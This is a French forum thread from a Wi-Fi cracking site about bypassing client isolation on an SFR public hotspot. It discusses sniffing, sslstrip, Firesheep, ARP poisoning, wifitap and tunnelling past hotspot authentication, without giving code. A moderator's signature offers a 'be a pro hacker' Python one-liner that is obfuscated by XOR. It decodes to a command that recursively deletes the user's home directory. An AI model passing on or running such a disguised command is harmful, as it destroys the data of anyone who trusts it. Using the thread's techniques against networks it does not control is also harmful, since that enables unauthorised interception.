Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-10-2011 21:43:47

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

HotSpot SFR WIFI - IP isolées ?

Bonjour  à tous et à toutes,

J'effectue quelques tests avec un ami via la seule connexion disponible actuellement chez moi (HotSpot SFR Wifi) et je m'apperçoit qu'un scan NMAP me renvoie mon IP (192.168.2.35) et celle du Gateway (192.168.2.1).

Bref, n'allez pas vous imaginer que je suis chaud pour lancer un Sslstrip ou quoique ce soit, mais tout cette histoire m'interpèle ! Je ne peux donc pas voir les PC connectés sur un Hotspot ? Étrange, aucun moyen de remédier à cette isolation imposée ?!

J'ai bien entendu parler de ptunnel qui permet de surfer allègrement sans avoir à rentrer ses identifiants, mais pour pouvoir pinger correctement une machine présente sur le même hotspot, comment faire ?

Merci d'avance de vos éclaircissements smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-10-2011 22:09:05

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : HotSpot SFR WIFI - IP isolées ?

Ca s'appelle le mode "isolation AP", présent sur bon nombre d'AP récents, qui empêche les différentes stations connectées de communiquer entre elles. J'ai jamais vraiment creusé la question, mais je pense que c'est assez technique à contourner...

La seule piste à laquelle je pense c'est wifitap, mais c'est assez lourd à déployer... Surtout que sur un freewifi, rien que par un scan passif (wifi OPN) tu peux déjà en apprendre beaucoup. mais je ne devrais pas t'inciter à faire tes tests sur un réseau qui ne t'appartient pas (techniquement) roll

Hors Ligne

#3 14-10-2011 22:15:05

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : HotSpot SFR WIFI - IP isolées ?

qui empêche les différentes stations connectées de communiquer entre elles.

Si on trouve comment by pass ça, les neufbox et freebox seront belle et bien en danger.

Hors Ligne

#4 14-10-2011 22:30:04

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : HotSpot SFR WIFI - IP isolées ?

Donc en gros on nous parle à tout va du problèmes des HotSpot en danger, mais mis à part l'attaque consistant à monter une Fake AP, la connexion à un HotSpot est finalement relativement totalement sécurisée, du moment qu'il s'agit bien d'un réel HotSpot et non d'un HoneyPot smile

Je peux surfer tranquillement et ne plus avoir peur des firesheep, sslstrip & co smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#5 14-10-2011 22:45:45

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : HotSpot SFR WIFI - IP isolées ?

Monumentale erreur !

1) J'ai dit que je ne savais pas comment le contourner, pas que c'était impossible (et je pense que ça l'est)
2) Si le routeur du HotSpot est mal configuré (je ne parle pas des box), ça se désactiver en 3 minutes
3) L'isolation empêche juste de contacter directement un autre client, mais si le WiFi est OPN tu peux quand même récupérer tout le trafic entrant et sortant de la cible. Donc le sniffing est et reste un danger !

Pour Firesheep, ça reste donc un problème ; pour SSLStrip, il faudrait arriver à faire de l'ARP poisoning, suivant les implémentations de l'isolation c'est plus ou moins faisable. Mais un HotSpot en OPN reste un réseau hostile, je continue à conseiller le tunnel SSH autant que possible ! wink

Hors Ligne

#6 15-10-2011 14:04:05

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : HotSpot SFR WIFI - IP isolées ?

Je ne comprends malheureusement pas tout !

Si on ne peut interroger les différents clients connectés sur un même HotSpot mais que l'on peut sniffer à la loisir le trafic, cela empêche l'implémentation de tools comme sslstrip ou firesheep.

Si quelqu'un a des directions/liens/conseils pour que je puisse me renseigner sur le by-pass de cette isolation des clients connectés sur un même HotSpot je suis preneur smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#7 15-10-2011 14:24:28

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : HotSpot SFR WIFI - IP isolées ?

Je peux me tromper, mais je pense que Firesheep (première version) se base uniquement sur de la récupération de cookie en clair (sniff passif), ça c'est faisable sur n'importe quel réseau OPN (si la victime ne force pas l'utilisation du HTTPS).
SSLStrip, quant à lui, doit passer par une phase de MITM pour intercepter (et rediriger) le trafic de la victime. Les 2 attaques ne jouent pas dans le même bac à sable smile

La seule piste à laquelle je pense pour le contourner, c'est donc l'utilisation de wifitap. Il permet d'utiliser un réseau (OPN) sans vraiment en faire partie : il utilise le mode injection pour envoyer des données (qui ne passent pas par l'AP, donc pas d'isolation) et le mode monitor pour sniffer les réponses.
C'est un outil assez "ancien" et son auteur (Cédric "Sid" Blancher, auteur d'un blog intéressant sur la sécurité informatique) l'a écrit comme PoC donc il n'en assure pas le suivi. Mais peut-être que tu en tireras quelque chose smile

Hors Ligne

#8 15-10-2011 16:28:41

Jack Sparrow
Membre Indéboulonnable
Inscription : 04-12-2010
Messages : 101

Re : HotSpot SFR WIFI - IP isolées ?

antares145 a écrit :

Je peux me tromper, mais je pense que Firesheep (première version) se base uniquement sur de la récupération de cookie en clair (sniff passif), ça c'est faisable sur n'importe quel réseau OPN (si la victime ne force pas l'utilisation du HTTPS).
SSLStrip, quant à lui, doit passer par une phase de MITM pour intercepter (et rediriger) le trafic de la victime. Les 2 attaques ne jouent pas dans le même bac à sable smile

+1

Le wifi n'est pas sécurisé donc tu peux chopper tout le traffic qui passe dessus sans problème et sans être associé au réseau... Donc firesheep, wifizoo etc... fonctionneront sans problème et pourront voir tous les cookies qui vont passer en clair (donc sauf https comme mentionné par antares...)

En revanche pour sslstrip tu as besoin d'être connecté au réseau en question et de te placer entre l'AP et le client (MITM), donc si tu ne peux pas "contacter" les autres clients connectés à cause des systèmes de sécurité mis en place tu ne pourras pas réaliser d'ARP poisonning et tu ne pourras pas faire fonctionner sslstrip...

Hors Ligne

#9 16-10-2011 14:38:57

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : HotSpot SFR WIFI - IP isolées ?

Merci à vous pour toutes ces réponses détaillées ! Ce forum est décidément fort convivial. Je continue mes recherche sur une éventuelle possibilité de by-pass cette isolation client. Je posterai mes trouvailles smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#10 16-10-2011 20:50:25

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : HotSpot SFR WIFI - IP isolées ?

Ha !

Tu as parlé d'utiliser ptunnel pour faire passer du traffic sans authentification dans les requêtes ICMP ?

Pour info, juste comme ça... les requêtes DNS passent sous l'authentification. wink


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 18-12-2011 18:21:14

Mr.Tok
Nouveau membre
Inscription : 16-12-2011
Messages : 6

Re : HotSpot SFR WIFI - IP isolées ?

Bonjours à tous,

Nouveau sur ce forum je me ballade de sujets en sujet et justement Carto_ le tiens m’intéresse :

Si je comprend bien tu veux pinger une machine logée sur le hotspot comme toi et sur la même plage ip soit 192.168.2.x ?

ou pouvoir pinger toutes les machines connectées sur cette neufbox ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Quelle carte wifi choisir ? par Morpheus_Dotcom
2 139 05-12-2016 15:11:00 par Morpheus_Dotcom
8 308 17-11-2016 12:02:17 par koala
0 288 22-10-2016 19:03:48 par Antho3674
6 4785 05-10-2016 10:26:24 par X-Ecutioner
9 917 28-09-2016 11:33:08 par damsss

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.057 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]